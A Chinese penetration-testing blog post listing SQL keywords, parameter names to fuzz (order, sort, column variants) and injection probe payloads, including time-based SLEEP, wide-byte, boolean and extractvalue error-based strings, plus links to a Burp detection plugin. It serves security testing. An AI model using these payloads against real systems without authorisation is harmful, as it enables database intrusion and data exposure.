文章总结： 本文介绍了SQL注入检测的关键方法，重点列举了用于Fuzzing的SQL关键字及常见参数名，如order、column、sort等变体。文章提供了实用的参数值POC以验证注入点，并推荐了DouSqlBurp插件作为辅助检测工具。同时关联了MySQL预编译限制及WebFuzzing相关资源，旨在帮助安全人员在实际测试中高效定位并验证SQL注入漏洞，提升渗透测试效率。 综合评分： 85 文章分类： 渗透测试,WEB安全,漏洞POC,安全工具

SQL 注入检测关键词

原创

进击的HACK

进击的HACK

2026年1月15日 07:50 江苏

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途给予盈利等目的，否则后果自行承担！如有侵权烦请告知，我会立即删除并致歉。谢谢！

文章有疑问的，可以公众号发消息问我，或者留言。我每天都会看的。

字数 354，阅读大约需 2 分钟

前言

我们在了解 SQL 语句哪些位置可以预编译，哪些位置不行后。怎么在实际测试中验证呢？

关于哪些地方可以预编译，哪些不行，可以看下面这篇：

MySQL 哪些位置可以预编译，哪些不行？

所有 SQL 关键字

如果发送的 HTTP 请求中，参数值包含下面的关键词：

SELECT
INSERT
UPDATE
DELETE
AND
OR
IN
BETWEEN
ORDER BY
DESC
ASC

数据库、表、列的标识符

这里看经验了。

常见参数名

如果是关键词检测，建议不区分大小写 如果是用来 Fuzzing，根据参数名规则，具体情况具体分析

filter
asc
asc_sort
ascSort
column
column_comment
column_first
column_index
column_key
column_name
column_type
column_types
columnBy
columnComment
columnFirst
columnIndex
columnKey
columnName
columns
columns_by
columns_comment
columns_first
columns_index
columns_key
columns_name
columns_type
columns_types
columnsBy
columnsComment
columnsFirst
columnsIndex
columnsKey
columnsName
columnType
columnTypes
custom_column
custom_columns
customColumn
customColumns
desc
desc_list
descList
has_column
has_columns
hasColumn
hasColumns
id
ids
is_asc
is_orderby
isAsc
isOrderBy
order
order_asc
order_by
order_desc
order_field
order_index
order_key
order_limit
order_list
order_name
order_type
order_types
orderAsc
orderby
orderByColumn
orderByColumns
orderBySort
orderDesc
orderField
orderIndex
orderKey
orderLimit
orderList
orderName
orderNum
orders%5b0%5d.asc
orders%5b0%5d.by
orders%5b0%5d.column
orders%5b0%5d.columns
orders%5b0%5d.desc
orders%5b0%5d.filed
orders%5b0%5d.index
orders%5b0%5d.limit
orders%5b0%5d.list
orders%5b0%5d.name
orders%5b0%5d.sort
orders%5b0%5d.type
orders%5b0%5d.types
orderType
orderTypes
sort
sort_by
sort_column
sort_columns
sort_field
sort_id
sort_index
sort_key
sort_list
sort_name
sort_no
sort_order
sort_type
sort_types
sortBy
sortByNum
sortByNumber
sortColumn
sortColumns
sortField
sortId
sortIndex
sortKey
sortList
sortName
sortNo
sortOrder
sortType
sortTypes
sql
sqlOrder
sqlOrderBy
widgets%5b0%5d%5border%5d

参数值 POC

'''
''''
/xxgg
/1
/*xxgg*/
/*xxgg/
%df' and sleep(3)#
%df" and sleep(3)#
'and '1'='1
"
' AND (SELECT 8079 FROM (SELECT(SLEEP(3)))aOzw)--
" AND (SELECT 8079 FROM (SELECT(SLEEP(3)))aOzw)--
") AND (SELECT 5879 FROM (SELECT(SLEEP(5)))OeYK) AND ("rbMC"="rbMC
') AND (SELECT 5879 FROM (SELECT(SLEEP(5)))OeYK) AND ('rbMC'='rbMC
'and extractvalue(1,concat(0x7e,(select @@version),0x7e))

检测工具

项目地址：https://github.com/darkfiv/DouSql

DouSql使用：Burp插件 | 基于Xia Sql 二次开发SQL注入检测插件 DouSql

参考资料

• • https://github.com/gh0stkey/Web-Fuzzing-Box

欢迎加入知识星球，星球内容主要有：

1、公众号文章备份、工具分享。

2、常见问题的答疑、解决方案汇总在知识星球，作为便于搜索的知识库。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：进击的HACK 进击的HACK《SQL 注入检测关键词》